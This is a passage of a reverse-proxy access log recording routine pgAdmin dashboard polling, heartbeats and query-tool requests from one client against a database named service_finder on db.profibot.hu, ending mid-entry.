db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:10:41:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:10:41:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:10:41:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/cleanup" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:10:42:18 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:10:42:18 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:10:42:18 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:10:42:20 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:10:42:21 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=" [Client 84.1.26.27] [Length 2] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:10:42:22 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:10:42:24 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:10:42:24 +0000] - 200 200 - POST https db.profibot.hu "/settings/save_application_state" [Client 84.1.26.27] [Length 90] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:10:42:26 +0000] - 200 200 - POST https db.profibot.hu "/sqleditor/query_tool/start/3857941" [Client 84.1.26.27] [Length 138] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:10:42:26 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:10:42:26 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/poll/3857941" [Client 84.1.26.27] [Length 399] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:10:42:26 +0000] - 500 500 - GET https db.profibot.hu "/sqleditor/poll/3857941" [Client 84.1.26.27] [Length 410] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:10:42:26 +0000] - 200 200 - POST https db.profibot.hu "/sqleditor/query_history/3857941" [Client 84.1.26.27] [Length 90] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:10:42:26 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:10:42:28 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:10:42:30 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:10:42:31 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:10:42:36 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:10:42:36 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:10:42:41 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:10:42:46 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:10:42:51 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:10:42:56 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:10:43:01 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:10:43:06 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:10:43:06 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:10:43:11 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:10:43:16 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:10:43:21 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:10:43:26 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:10:43:31 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:10:43:34 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:10:43:35 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:10:43:36 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:10:43:36 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:10:43:38 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:10:43:39 +0000] - 200 200 - POST https db.profibot.hu "/settings/save_application_state" [Client 84.1.26.27] [Length 90] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:10:43:40 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:10:43:41 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:10:43:41 +0000] - 200 200 - POST https db.profibot.hu "/sqleditor/query_tool/start/3857941" [Client 84.1.26.27] [Length 138] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:10:43:41 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/poll/3857941" [Client 84.1.26.27] [Length 399] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:10:43:41 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/poll/3857941" [Client 84.1.26.27] [Length 316] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:10:43:41 +0000] - 200 200 - POST https db.profibot.hu "/sqleditor/query_history/3857941" [Client 84.1.26.27] [Length 90] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:10:43:41 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:10:43:43 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:10:43:45 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:10:43:46 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:10:43:51 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:10:43:56 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:10:44:01 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:10:44:06 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:10:44:06 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:10:44:11 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:10:44:16 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:10:44:21 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:10:44:26 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:10:44:31 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:10:44:36 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:10:44:36 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:10:44:41 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:10:44:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:10:45:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:10:45:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:10:46:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:10:46:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:10:46:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/cleanup" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like 